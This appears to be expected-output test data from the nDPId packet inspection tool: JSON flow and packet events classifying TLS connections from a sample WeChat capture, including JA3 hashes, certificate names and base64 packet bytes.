+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA044hAAEAGMbzAqAFny82XotNdAbtNZ116WRhNMIARAViFkQAAAQEICgAxu\/1F0qIP"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0trJAAEAGXpLAqAFny82XotNeAbstqSV4qlMZrIARASwk9gAAAQEICgAxu\/1Frj0D"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617248,"flow_last_seen":1492167617248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617248,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1492167617248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617248,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8JpFAAEAG7qvAqAFny82XotNfAbt51Z1vAAAAAKACchAH4QAAAgQFtAQCCAoAMbv+AAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617498,"flow_last_seen":1492167617498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617498,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 